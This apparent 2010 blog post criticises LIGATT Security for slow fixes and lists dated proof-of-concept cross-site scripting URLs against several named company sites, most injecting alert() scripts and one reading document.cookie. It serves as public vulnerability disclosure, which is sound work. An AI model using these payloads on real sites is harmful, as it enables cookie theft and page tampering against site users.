Evans, LIGATT and the XSS Mess
Sun Jun 20 14:06:22 CDT 2010
Gregory Evans is the CEO of LIGATT Security International, a company that offers security
products and services. He also runs several other web sites as part of his business including
spoofem.com, untraceablemail.net and nationalcybersecurity.com. As you might expect, a
security company should generally have a relatively secure system to impress upon their
clients their own integrity and ability to audit a system. In today's world of complex
software, ever changing systems (e.g., upgrades, new features) and time constraints,
it is also expected that even security companies will be found vulnerable in some fashion.
It isn't just about having a vulnerability these days, it is more about how a company
responds to the incident. Did they fix it in a timely fashion? Did they determine if it
impacted customers? Did they learn from the mistake and try to implement better policies or
controls to prevent it from happening again? If the answer to any of those questions is 'no',
then a certain level of criticism and skepticism can be leveled at the security company.
On May 15, 2010, casual browsing of LIGATT's site and a quick "paste generic script code" test
found their security to be fairly lacking.
Not only were they vulnerable to cross-site scripting (XSS),
there were a number of other configuration issues that any decent administrator, security consultant
or 'hacker' should have caught. Over the next month, several additional XSS vulnerabilities were
discovered in various LIGATT run sites. As of June 20, 2010, over 35 days later, only one of them
appears to be fixed. That is the damning part of this fiasco; that Evans and LIGATT don't seem to
care about the vulnerabilities or understand security enough to fix them.
If LIGATT performs audits for any client, they would presumably bring these same
types of issues up and strongly encourage the client to fix them fast. Unless of
course, they do not have the skills required to find such vulnerabilities during an audit.
| Dates |
Site / XSS |
Image |
Found:
Jun 21, 2010 |
http://untraceableemail.net/spoofnet_proxy/index.php?e=curl_error&return=http://untraceableemail.net/spoofnet_proxy/browse.php%22%3
%3Cscript%3Ealert%28document.cookie%29%3C%2fscript%3E%0A
Submitted by Anon02 |
 |
Found:
Jun 21, 2010 |
http://untraceableemail.net/spoofnet_proxy/browse.php?u=Oi8vdnVsbi54c3NlZC5uZXQvMjAxMC8wNi8wNy93d3cubGlnYXR0c2VjdXJpdHkuY29tJTI4MSUyOS8=&b=5&f=norefer
Submitted by Anon02 |
 |
Found:
Jun 21, 2010 |
http://www.spoofem.com/phplive/message_box.php?theme=&l=greg&x=1&deptid=3"><script>alert(document.location);</script>
Submitted by Anon01 |
 |
Found:
Jun 21, 2010 |
http://www.spoofem.com/phplive/index.php?winapp=0"><script>alert(document.location);</script>
Submitted by Anon01 |
 |
Found:
Jun 21, 2010 |
http://www.untraceableemail.net/dealer/index.php?message=<script>alert(document.location);</script>
Submitted by Anon01 |
 |
Found:
Jun 19, 2010
Still Vuln:
?? |
http://www.nationalcybersecurity.com/search?Query=%3CIMG+SRC%3D%22http%3A%2F%2Fattrition.org/images/squirrel-mascot-iconL.gif%22%3E&fromSmall=true&searchWhat=searchAll&submit.x=20&submit.y=10&searchField=searchContentBody&searchField=searchContentBody
Note: Original POC used a Google logo that many sites have used. POC above calls a more distinct image to prove the vulnerability. |
 |
Found:
Jun 18, 2010
Fixed:
Jun 19, 2010 (?) |
http://www.nationalcybersecurity.com/authors/31/Gregory-Evans
Stored XSS on the Gregory Evans author profile page. It is not clear how this was done, or if it represents
a compromise of his account. The replaced graphic (stick figure) instead of the regular Evans portrait suggests
possible compromise. |
 |
Found:
Jun 18, 2010
Still Vuln:
Jun 20, 2010 |
http://www.spoofem.net/joetest/index.php?action=abuse_verification_post&area=%3Cscript%3Ealert%280%29;%3C/script%3E
Discovered by "P.B.", posted to private Twitter feed. |
 |
Found:
May 28, 2010
Still Vuln:
Jun 20, 2010 |
http://www.untraceableemail.net/login/index.php?ref=--%3E%3Cscript%3Ealert(String.fromCharCode(120,115,115))%3C/script%3E
Original: http://quine.dreamwidth.org/3083.html |
 |
Found:
May 26, 2010
Still Vuln:
?? |
http://www.nationalcybersecurity.com/admin/index.php?username=<script>alert('xss')</script>
Original: http://quine.dreamwidth.org/2904.html |
 |
Found:
May 19, 2010
Still Vuln:
?? |
http://www.nationalcybersecurity.com/search?Query=<script>alert('xss')</script>
Original: http://quine.dreamwidth.org/2722.html |
 |
Found:
May 15, 2010
Still Vuln:
Jun 7, 2010
Fixed:
Jun 8, 2010 (?) |
http://www.ligattsecurity.com/?s=</title><html><script>alert('No1Hacker')</script>
http://www.ligattsecurity.com/?s=<script>+alert+('ATEN LABS PWNS YOU')+</script>&submit.x=0&submit.y=0
Note: The first variation was fixed several days later. The second variation was discovered and worked until
some time shortly after Jun 7. |
 |
